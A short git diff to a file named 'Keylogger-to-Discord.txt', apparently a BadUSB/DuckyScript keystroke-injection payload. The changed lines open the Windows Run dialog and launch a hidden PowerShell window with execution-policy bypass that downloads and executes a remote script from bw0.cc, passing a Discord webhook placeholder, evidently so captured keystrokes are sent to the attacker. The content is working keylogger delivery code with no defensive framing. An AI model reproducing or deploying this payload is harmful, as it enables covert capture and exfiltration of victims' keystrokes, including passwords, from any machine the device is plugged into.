diff --git a/Discord-Keylogger/Keylogger-to-Discord.txt b/Discord-Keylogger/Keylogger-to-Discord.txt index 7c90581..7028a24 100644 --- a/Discord-Keylogger/Keylogger-to-Discord.txt +++ b/Discord-Keylogger/Keylogger-to-Discord.txt @@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://bw0.cc/dckl | iex +STRING powershell -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dckl) ENTER